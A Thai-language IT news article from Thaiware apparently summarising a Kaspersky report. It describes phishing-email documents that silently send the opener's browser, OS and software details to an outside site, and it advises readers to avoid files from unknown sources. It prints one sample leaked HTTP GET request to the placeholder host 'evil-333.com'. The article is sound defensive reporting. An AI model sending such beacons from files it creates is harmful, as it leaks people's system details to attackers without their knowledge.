ดาวน์โหลดโปรแกรมฟรี
Facebook  Twitter  YouTube  News Letter  Rss Feed
ติดตามไทยแวร์ได้ที่นี่
  
ข่าวไอที
 
ส่งข่าวไอทีเข้าไทยแวร์ดอทคอม (Submit News to Thaiware.com)
 

Recommended for you

ระวัง! ถูกแฮกข้อมูลแบบไม่รู้ตัว ถ้าเปิดดูไฟล์ในอีเมลที่ไม่น่าไว้วางใจ

เมื่อ :
ผู้เข้าชม : 2,856
เขียนโดย :
ระวัง! ถูกแฮกข้อมูลแบบไม่รู้ตัว ถ้าเปิดดูไฟล์ในอีเมลที่ไม่น่าไว้วางใจ
0 %E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B1%E0%B8%87%21+%E0%B8%96%E0%B8%B9%E0%B8%81%E0%B9%81%E0%B8%AE%E0%B8%81%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%95%E0%B8%B1%E0%B8%A7+%E0%B8%96%E0%B9%89%E0%B8%B2%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%94%E0%B8%B9%E0%B9%84%E0%B8%9F%E0%B8%A5%E0%B9%8C%E0%B9%83%E0%B8%99%E0%B8%AD%E0%B8%B5%E0%B9%80%E0%B8%A1%E0%B8%A5%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%99%E0%B9%88%E0%B8%B2%E0%B9%84%E0%B8%A7%E0%B9%89%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%83%E0%B8%88
A- A+

Kaspersky Lab ค้นพบช่องทางขโมยข้อมูลแบบใหม่ ในฟีเจอร์ของโปรแกรมพิมพ์เอกสารยอดนิยม ที่สามารถนำมาใช้ดักจับข้อมูลต่างๆ ไม่ว่าจะเป็น ข้อมูลเบราว์เซอร์ ข้อมูลเวอร์ชั่นของระบบปฏิบัติการ ข้อมูลซอฟต์แวร์ หรืออุปกรณ์ที่เปิดไฟล์ ทั้งบนคอมพิวเตอร์พีซี และมือถือสมาร์ทโฟน ได้แบบชนิดที่เรียกว่า "แนบเนียนสุดๆ

ระวัง! ถูกแฮกข้อมูลแบบไม่รู้ตัว ถ้าเปิดดูไฟล์ในอีเมลที่ไม่น่าไว้วางใจ
ตัวอย่างไฟล์เอกสาร "คำแนะนำวิธีการใช้กูเกิ้ลเสิร์ชเอนจิ้นให้ได้ประโยชน์สูงสุด" ที่ดูเหมือนจะไม่มีอะไร แต่ภายในมีโค้ดล้วงข้อมูลฝังอยู่

สิ่งที่จะทำให้ช่องโหว่นี้ทำงานก็คือ ไฟล์เอกสารที่แนบมาใน ฟิชชิงอีเมล (อีเมลที่หลอกให้คนกดเข้าไปอ่าน) หากผู้ใช้ "เปิดดูไฟล์" มันก็จะทำการส่งคำขอ GET Request ไปยังเว็บไซต์ภายนอกพร้อมกับข้อมูลต่างๆ โดยที่เราไม่รู้ตัว

*ตัวอย่างข้อมูลที่ถูกส่งไปยังเว็บไซต์ภายนอก
GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

และข้อมูลที่ถูกส่งออกไปนั้น มีทั้งประเภทของเว็บเบราว์เซอร์ที่ใช้ (Browser) ข้อมูลเวอร์ชั่นระบบปฏิบัติการ (OS) ข้อมูลซอฟต์แวร์ต่างๆ ที่ติดตั้งในเครื่อง (Trident, SLCC, .NET ฯลฯ) รวมถึงโปรแกรมที่ใช้เปิดไฟล์นั้นอีกด้วย ถือว่าเป็นเรื่องที่อันตรายมากๆ หากข้อมูลเหล่านี้อยู่ในมือแฮกเกอร์ อาจส่งผลเสียร้ายแรง และไม่แน่ว่าอาจจะถูกเจาะเข้าระบบง่ายขึ้นก็ได้นะ โดยช่องโหว่นี้ทาง Kaspersky Lab ได้แจ้งให้ผู้มีส่วนเกี่ยวข้องทราบเรียบร้อยแล้ว แต่ยังไม่มีการตอบกลับมาแต่อย่างใด เราคงต้องรอติดตามข่าวกันอีกที

อย่างไรก็ตามผู้เขียนมีวิธีป้องกันตัวแบบง่ายที่ใครๆ ก็ทำได้มาแนะนำก็คือ หลีกเลี่ยงการดาวน์โหลดไฟล์ต่างๆ ที่เราไม่รู้แหล่งที่มา และถ้าจำเป็นต้องเปิดจริงๆ ให้นำชื่อของแหล่งที่มานั้น ไปเสิร์ชหาข้อมูลบนอินเทอร์เน็ตก่อน เมื่อเราคิดว่ามั่นใจแล้วจึงค่อยเปิดดู ซึ่งวิธีนี้ยังใช้ป้องกันมัลแวร์ต่างๆ ได้อีกด้วยนะ หวังว่าข้อมูลนี้จะมีประโยชน์ไม่มากก็น้อยแก่ผู้อ่านทุกคน


ที่มา : securelist.com


0 %E0%B8%A3%E0%B8%B0%E0%B8%A7%E0%B8%B1%E0%B8%87%21+%E0%B8%96%E0%B8%B9%E0%B8%81%E0%B9%81%E0%B8%AE%E0%B8%81%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5%E0%B9%81%E0%B8%9A%E0%B8%9A%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%A3%E0%B8%B9%E0%B9%89%E0%B8%95%E0%B8%B1%E0%B8%A7+%E0%B8%96%E0%B9%89%E0%B8%B2%E0%B9%80%E0%B8%9B%E0%B8%B4%E0%B8%94%E0%B8%94%E0%B8%B9%E0%B9%84%E0%B8%9F%E0%B8%A5%E0%B9%8C%E0%B9%83%E0%B8%99%E0%B8%AD%E0%B8%B5%E0%B9%80%E0%B8%A1%E0%B8%A5%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B9%84%E0%B8%A1%E0%B9%88%E0%B8%99%E0%B9%88%E0%B8%B2%E0%B9%84%E0%B8%A7%E0%B9%89%E0%B8%A7%E0%B8%B2%E0%B8%87%E0%B9%83%E0%B8%88
แบ่งปันหน้าเว็บนี้ผ่าน URL :
Keyword คำสำคัญ »
เขียนโดย
ระดับผู้ใช้ : Admin    Thaiware
How to ....
 
 
 
 

ข่าวไอทีที่เกี่ยวข้อง



 

Recommended for you

 

แสดงความคิดเห็น

 

แผนผังเว็บไซต์ (XML Sitemap)
Thaiware Communication Co.,Ltd.

Thaiware Communication Co.,Ltd.

Copyright 1999-2019 Thaiware.com All rights reserved.
E-Commerce Registration Number : 0108414736771
เลขประจำตัวผู้เสียภาษี / Tax ID : 010-554-707-3996